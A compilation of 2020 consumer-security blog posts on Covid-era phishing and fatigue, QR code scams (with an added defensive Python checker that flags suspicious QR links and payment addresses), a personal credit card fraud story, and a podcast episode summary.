Because COVID-19 has forced much of the globe to spend a lot more time online, it has opened up the floodgates for cybercriminal activity, misinformation, and digital infection. Here, at the crossroads of Covid, security, and alert fatigue, people might find themselves in just as much danger on the Internet as they would be at a packed rally of maskless, cheering crowds.

Caroline Wong, CSO of pentest-as-a-service company Cobalt, recently spoke to Malwarebytes employees at a virtual fireside chat about Covid fatigue.

“One of the things that I worry about the most is anxiety and burnout and what that means for human error,” she said. “When we’re anxious, maybe we’re more likely to fall for a phishing scam. When I’m burnt out, maybe I’m more likely to purposefully or accidentally take some kind of a shortcut. Every behavior of an employee affects the security posture of the company.”

And behaviors have changed drastically for both users and cybercriminals since the onset of COVID-19. Here are a few examples of how threat actors are taking advantage of fatigued users:

  • Now that more people are shopping online to avoid crowded stores, cybercriminals have stepped up their credit card skimming efforts on legitimate sites. In just the first month of sheltering in place, digital skimming was up 26 percent. Users were previously told that a site secured by “https” and a lock icon should be safe. Those rules are now out the window.
  • Threat actors have weaponized information on COVID-19, using it as a hook to lure phishing victims, from SBA scams to nation-state espionage. Just consuming information about COVID-19 from the wrong source, then, could compromise users’ safety.
  • Students are distance learning, often on their own devices. And parents/individuals are mostly working from home, again using their (unprotected) personal devices to conduct work, or work devices to conduct personal errands. Cybercriminals look to capitalize on these risky choices by targeting employees on insecure devices and infiltrating business/school networks in the process.

“I think the biggest threat from Covid fatigue comes down to the massive distraction it causes,” said Adam Kujawa, Director of Malwarebytes Labs. “People who are so desperate for hope might scrutinize less and end up falling into a trap or exposing themselves to cyberthreats, just for the idea of relief.”

Combine this with the general malaise brought on by Covid fatigue, and you get an exponentially higher chance of infecting your home and business networks, rendering your devices obsolete, having your PII stolen and sold on the black market, opening the door for nation-state actors to spy on your organization, or even inviting threat actors to seize company files and ransom them for a hefty price.

How to fight Covid fatigue

If one of the symptoms of fatigue is feeling overwhelmed by a heavy dose of information and advice about what to do to combat a threat, how do you go about giving important information and advice about what to do to combat that threat? One method would be to consider the factors that are causing stress and fatigue and then deliver simple, actionable instructions to counter those factors. For example, if a constantly changing outlook on the future of the pandemic and other mixed messages are creating anxiety, consider only visiting a small selection of websites to find answers.

In researching for this article, I came across dozens of different recommendations for combatting Covid and security fatigue. Rather than overwhelm readers with too many choices, I opted to boil down all instructions to the three most pertinent. For battling Covid fatigue, try:

  1. Turning to a coping mechanism. Take a five-minute break from the screen or TV if COVID-19 news is getting you down. If you need more time, spend it consumed in a favorite hobby to re-energize.
  2. Lowering your expectations. This may sound crude, but what it really means is give yourself a break. If you’re forgetting words or taking a long time to complete a project, forgive yourself. And if you think a vaccine will definitely be here in January 2021, perhaps consider placing your hopes elsewhere.
  3. Talking to someone. COVID-19 has been isolating for all of us. When loneliness strikes, schedule a virtual happy hour with a close friend, jump on a phone call with family members, or book an appointment with a trusted counselor.

In addition, remember these key preventative measures for keeping the virus at bay, recommended by leading scientists:

  1. Wear a mask in public. That includes not just stores and workplaces, but at any gathering with people outside your household.
  2. Wash your hands frequently. Especially after being around other people or handling any objects that came from outside your home.
  3. Practice social distancing. When in doubt, stay at least six feet away from others. Refrain from gathering in large groups, especially indoors in poorly-ventilated areas.

And finally, to ensure you don’t let Covid fatigue transform into security fatigue, remember these three important rules:

  1. Use a password manager. To avoid re-using passwords across accounts or having to remember 27 different ones, a password manager will keep your account credentials encrypted inside a digital vault, which can only be opened by a single master password. For extra protection, employ multi-factor authentication.
  2. Use security software on all of your devices, including your mobile phone. (iPhones don’t allow for external antivirus protection, but they do let users download robocall blockers and apps that secure mobile browsers.)
  3. Use common sense. We’ve learned that “trust but verify” doesn’t work for the Internet. If it seems too good to be true…you know the rest.

The post How Covid fatigue puts your physical and digital health in jeopardy appeared first on Malwarebytes Labs.

QR code scams are making a comeback

Just when we thought the QR code was on its way out, the pandemic has led to a return of the scannable shortcut. COVID-19 has meant finding a digital equivalent to things normally handed out physically, like menus, tour guides, and other paperwork, and many organizations have adopted the QR code to help with this. And so, it would seem, have criminals. Scammers have dusted off their book of tricks that abuse QR codes, and we’re starting to see new scams. Or maybe just old scams in new places.

What is a QR code again?

A quick recap for those that missed it. A Quick Response (QR) code is nothing more than a two-dimensional barcode. This type of code was designed to be read by robots that keep track of items in a factory. As a QR code takes up a lot less space than a legacy barcode, its usage soon spread.

Smartphones can easily read QR codes—all it takes is a camera and a small piece of software. Some apps, like banking apps, have QR code-reading software incorporated to make it easier for users to make online payments. In some other cases, QR codes are used as part of a login procedure.

QR codes are easy to generate and they are hard to tell apart. To most human eyes, they all look the same. More or less like this:

[Image: QR code. URL to my contributor profile here]

Why are QR codes coming back?

For some time, these QR codes were mainly in use in industrial environments to help keep track of inventory and production. Later they gained some popularity among advertisers because it was easier for consumers to scan a code than to type a long URL. But people couldn’t tell from a QR code where scanning would lead them, so they got cautious and QR codes started to disappear. Then along came the pandemic and entrepreneurs had to get creative about protecting their customers against a real life virus infection.

To name an example, for fear of spreading COVID-19 through many people touching the same menu in a restaurant, businesses placed QR codes on their tables so customers could scan the code and open the menu in the browser on their phone. Clean and easy. Unless a previous visitor with bad intentions had replaced the QR code with his own. Enter QR code scams.

Some known QR code scams

The easiest QR code scam to pull off is clickjacking. Some people get paid to lure others into clicking on a certain link. What better way than to replace QR codes on a popular monument, for example, where people expect to find background information about the landmark by following the link in the QR code. Instead, the replaced QR code takes them to a sleazy site and the clickjacking operator gets paid his fee.

Another trick is the small advance payment scam. For some services, it’s accepted as normal to make an advance payment before you can use that service. For example, to rent a shared bike, you are asked to make a small payment to open the lock on the bike. The QR code to identify the bike and start the payment procedure is printed on the bike. But the legitimate QR codes can be replaced by criminals that are happy to receive these small payments into their own account.

Phishing links can just as easily be disguised as QR codes. Phishers place QR codes where it makes sense for the user. So, for example, if someone is expecting to login to start a payment procedure or to get access to a certain service, the scammers may place a QR code there. We’ve also seen phishing mails equipped with fraudulent QR codes.

[Image: Phishing QR code. Image courtesy of Proofpoint]

The email shown above instructed the receiver to install the “security app” from their bank to avoid their account being locked down. However, it pointed to a malicious app outside of the webstore. The user had to allow installs from an unknown source to do this, which should have been a huge red flag, but still some people fell for it.

Lastly, there’s the redirect payments scam, which was used by a website that facilitated Bitcoin payments. While the user entered a Bitcoin address as the receiver, the website generated a QR code for a different Bitcoin address to receive the payment. It’s yet another scam that demonstrates that QR codes are too hard for humans to read.

How to avoid QR code scams

There are a few common-sense methods to avoid the worst QR code scams:

  • Do not trust emails from unknown senders.
  • Do not scan a QR code embedded in an email. Treat them the same as links because, well, that’s what they are.
  • Check to see whether a different QR code sticker was pasted over the original and, if so, stay away from it. Or better yet, ask if it’s OK to remove it.
  • Use a QR scanner that checks or displays the URL before it follows the link.
  • Use a scam blocker or web filter on your device to protect you against known scams.

Even if the mail from a bank looks legitimate, you should at least double-check with the bank (using a contact number you’ve found on a letter or their website) if they ask you to log in on a site other than their own, install software, or pay for something you haven’t ordered.

As an extra precaution, do not use your banking app to scan QR codes if they fall outside of the normal pattern of a payment procedure.
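What "checks or displays the URL before it follows the link" can look like in practice, as an added example that is not from the original article: the decoded QR text is inspected without being opened, and the traits of the scams described above are flagged. The function name, the warning texts and every host and address shown are constructed for this example.

```python
import ipaddress
from urllib.parse import urlsplit


def inspect_qr_payload(payload, expected_hosts=(), expected_btc_address=None):
    """Describe where a decoded QR payload leads, without opening it.

    expected_hosts: hosts the user expects to land on (for example the venue's
    own site); subdomains of them are accepted.
    expected_btc_address: the receiving address the user entered, if any.
    """
    text = payload.strip()
    parts = urlsplit(text)
    scheme = parts.scheme.lower()
    warnings = []

    if scheme == "bitcoin":
        # Redirect-payment scam: the code encodes a different receiver.
        address = parts.path
        if expected_btc_address and address != expected_btc_address:
            warnings.append("payment address differs from the one you entered")
        return {"kind": "payment", "destination": address, "warnings": warnings}

    if scheme not in ("http", "https"):
        warnings.append(f"unexpected scheme {scheme!r}")
        return {"kind": "other", "destination": text, "warnings": warnings}

    host = (parts.hostname or "").lower()
    if scheme == "http":
        warnings.append("link is not encrypted (http)")
    if parts.username:
        # "https://trusted.example@other.example/" really goes to other.example.
        warnings.append("text before '@' is not the real destination")
    try:
        ipaddress.ip_address(host)
        warnings.append("destination is a bare IP address")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        warnings.append("internationalised host name, may imitate another name")
    if expected_hosts and not any(
        host == h or host.endswith("." + h) for h in expected_hosts
    ):
        warnings.append("destination is not a host you expected")
    if parts.path.lower().endswith(".apk"):
        # The phishing mail above pushed an app from outside the store.
        warnings.append("direct app download from outside the app store")
    return {"kind": "link", "destination": host, "warnings": warnings}


# Constructed payloads, one per situation discussed in the article.
SAMPLES = [
    ("https://menu.restaurant.example/table/12", ("restaurant.example",), None),
    ("https://restaurant.example@203.0.113.50/menu", ("restaurant.example",), None),
    ("http://bank-security.example/app/security.apk", ("bank.example",), None),
    ("bitcoin:bc1qCONSTRUCTEDotherADDRESS?amount=0.01", (), "bc1qCONSTRUCTEDmyADDRESS"),
]

if __name__ == "__main__":
    for payload, hosts, btc in SAMPLES:
        result = inspect_qr_payload(payload, hosts, btc)
        print(payload)
        print("  leads to:", result["destination"])
        for warning in result["warnings"] or ["no warnings"]:
            print("  -", warning)
```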

Do I want to know what’s next?

Maybe not, but forewarned is forearmed. One method in development to replace QR codes on Android devices is the Near Field Communication (NFC) tag. NFC tags, like QR codes, do not require an app to read them on more modern devices. Most of the recent iPhones and Androids can read third-party NFC tags without requiring extra software, although older models may need an app to read them.

NFC tags are also impossible to read by humans but they do require an actual presence, i.e. they can’t be sent by mail. But with the rise in popularity of contactless payments, we may see more scams focusing on this type of communication.

Stay safe, everyone!

The post QR code scams are making a comeback appeared first on Malwarebytes Labs.

Caught in the payment fraud net: when, not if?

Sometimes, I think there are three certainties in life: death, taxes, and some form of payment fraud. Security reporter Danny Palmer experienced this a little while ago, and has spent a significant amount of time tracking the journey of his card details from the UK to Suriname. His deep-dive confirmed that it is easy to become tangled up in fraud, even if you’re very careful. I myself have experienced one of the more peculiar forms of credit card theft, detailed below.

Sometimes it’s you…

Right off the bat, let’s clarify that there are ways to both help and hinder the security of your payment information.

Maybe you switched something off while traveling for easy access and forgot to turn it back on at the other end. Perhaps there was some ancient Hotmail account still tied to something important with a password on six hundred thousand password dumps. Maybe you did one of those “Without giving your exact date of birth, please tell us something you’d recognise from your childhood and also your exact date of birth and credit card number” things bouncing around on social media.

These are all ways you can inadvertently generate problems for yourself at a later date.

Sometimes it isn’t you

On the other hand, instead of winding up in one of the above examples, let’s say you successfully navigated all perils.

You secured your desktop, installed some security software, followed the advice to keep your system up to date, and avoided all dubious installs. Locking down your phone was a great idea. Reading some blogs on password managers was the icing on the cake. You’ve done it all, and anything going wrong after this will have to be one heck of a fight.

There is, however, a third path outside of what you do or don’t do to keep data secure.

Occasionally, the issue is elsewhere

Maybe people you don’t know, who you entrusted with the well-being of your card data, did something wrong. Perhaps a Point of Sale terminal is missing vital patches. The store across town didn’t keep an eye on their ATM, and the company responsible for it didn’t have a means to combat the skimmer strapped across the card slot. The clothing store you bought your jacket from did a terrible job of locking down payment data and everything is sitting in the clear.

This is absolutely one of those “whatever will be, will be” moments.

The…good?…news about hacks outside of your control is, they can happen to anyone. Including people who work in security. As a result, you shouldn’t feel like you’ve done something wrong. In many cases, you almost certainly haven’t. It’s way beyond time to normalise the notion that huge servings of guilt aren’t a pre-requisite for data theft.

Setting the scene: My experience with card fraud

When I received my fraud missive through the post, it was shortly after an incredibly time-consuming and complicated continent-spanning house move. Did I make a multitude of payments in all directions? You bet. Shipping, storage, local transportation, and a terrifyingly long list of general administrative and paperwork duties from one end of a country to another.

I avoided using my banking debit card throughout the process, relying on my credit card instead. There’s a reason for this.

Interlude: why I used a credit card

If you buy something with your debit card and it ends up with a scammer, you may have problems recovering your funds. You may well have to endure a lengthy dispute process, or prove you weren’t being negligent in order to get your money back.

Increasingly, banks are making this a little harder to do.

If you bank online, you’ll almost certainly have seen a digital caveat any time you go to transfer money. They’re usually along the lines of waiving the ability to reclaim your money back if tricked into sending your cash to a scammer. They’ll ask you to confirm you know who you’re sending the money to or place the responsibility for transferring funds directly on your own shoulders. Perhaps they’ll try and get out of paying up if your PC was compromised by malware. If you pay by cheque, you could get into all sorts of tedious wrangling behind the scenes too.

Even without all of the above, your bank may well have a number of minimum best practices for you to follow. Unless you want to run into potential pitfalls, try and keep things ship-shape there too.

Meanwhile, the credit card is a fast-track to getting your money back, because it’s the incredibly large and powerful credit company getting their money back. You’re just there for the ride, as it were. This in no way removes your requirement to be responsible with your details, but from experience, I’ve had more success righting a cash-related wrong where it involved credit rather than debit. It’s an added form of leverage and protection. The real shame is that isn’t usually the case when paying with your own money. Once again, we’re back in the land of “whatever will be, will be”.

End of interlude: when things go wrong

I don’t know exactly what happened with my card, or who took the details. I’ve no idea if the details were swiped from an insecure database, or a store had Point of Sale malware on a terminal. I can’t say if it was cloned from one of the few times I had to use an ATM.

Stop and think about the places you frequently buy items from. Maybe even draw up a list on a map. You’ll almost certainly have a handful of stores you use regularly, with a few random places thrown in for good measure. Perhaps you avoid ATMs completely, opting for cashback in stores instead. You probably shop online at the same places too, with a few more off-the-beaten-track sites popping up here and there.

You may get lucky and discover one of them has had a breach. If they’re small shops or family businesses, sorry…you probably won’t read about it in the news. Website compromises can lie undetected for a long time. Same for Point of Sale malware on physical terminals. Your shopping circle of trust only extends so far and is only useful for figuring out a breach up to a point. After that, it’s guesswork and, for various reasons, your bank/credit card company won’t disclose investigation information.

The scammers strike

What I do know is that a letter came through the door telling me someone had tried to make a purchase of around 14 thousand pounds on my credit card. Their big plan was to order a huge supply of wine from a wine merchant. What I was told by the bank is that these aren’t places you can typically wander in off the street and throw some wine in a shopping trolley. These are organisations which sell directly to retailers.

Logic suggests that card fraud circles around small, inconspicuous transactions to remain off the grid. Nothing screams small, inconspicuous transactions like “a purchase more than the limit on your card for a bulk supply of rare, expensive wine from a direct to store wine merchant unavailable to the public”.

Though this is outside my realm of experience, my guess is a successful purchase would’ve resulted in the wine being sold on in ways which obscure the source of the original funds. By the time anyone has figured out what happened, the scammer has turned a profit and I’m left holding the incredibly large wine bag.

Luckily for me, “Make small inconspicuous transactions” doesn’t appear to have been in their playbook. Even if the fraud detection team had somehow missed this utterly out of character purchase, the scammers also managed to blow past my credit card limit. I assume the big fraud detection machine exploded and required a bit of a lie down afterwards to recover.

Dealing with the aftermath

I was very lucky, if you can call it that, because of the baffling way the scammers tried to rip me off. If the ludicrous size of the attempted payment hadn’t set alarm bells ringing, the unusual items purchased probably would have given the same end result. Similarly, Danny Palmer’s card flagged the fraud tripwires before any money was taken. Banks and credit card companies are constantly adding new ways to detect dubious antics and also make logging into banking portals a safer experience.

All the same, we shouldn’t rely on others too much to ensure our metaphorical bacon is saved at the last minute. Keep locking things down, be observant when using ATMs, and familiarise yourself with the security procedures for your payment method of choice. We can’t stop everything from going wrong, but we can certainly help tip the odds a little bit more in our favour.

I probably won’t crack open a bottle of wine to celebrate, though.

The post Caught in the payment fraud net: when, not if? appeared first on Malwarebytes Labs.

Lock and Code S1Ep16: Investigating digital vulnerabilities with Samy Kamkar

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Samy Kamkar, chief security officer and co-founder of Open Path, about the digital vulnerabilities in our physical world.

If you look through a recent history of hacking, you’ll find the clear significance of experimentation. In 2015, security researchers hacked a Jeep Cherokee and took over its steering, transmission, and brakes. In 2019, researchers accessed medical scanning equipment to alter X-ray images, inserting fraudulent, visual signs of cancer in a hypothetical patient.

Experimentation in cybersecurity helps us learn about our vulnerabilities.

Today, we’re discussing one such experiment—a garage door opener called “Open Sesame,” developed by Kamkar himself.

Tune in to hear about the “Open Sesame,” how it works, what happened after its research was presented, and how the public should navigate and understand a world rife with potential vulnerabilities on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Other cybersecurity news:

  • Threat intelligence researchers from Group-IB have outed a new Russian-speaking ransomware gang called OldGremlin, and it has been targeting big companies in Russia. (Source: CyberScoop)
  • Tyler Technologies, a product vendor of US states and counties during election seasons, recently admitted that an unknown party has hacked their internal systems. (Source: Reuters)
  • Graphika unearthed a campaign they called Operation Naval Gazing, which is aimed at supporting China’s territorial claim in the South China Sea. (Source: TechCrunch)
  • As the US elections draw near, the FBI and CISA warn voters against efforts and interference from foreign actors potentially spreading disinformation regarding election results. (Source: The Internet Crime Complaint Center (IC3))
  • Activision, the video game publisher for Call of Duty (CoD), denied that it had been hacked after reports that more than 500,000 accounts have had their login information leaked. (Source: Dexerto)

Stay safe, everyone!

The post Lock and Code S1Ep16: Investigating digital vulnerabilities with Samy Kamkar appeared first on Malwarebytes Labs.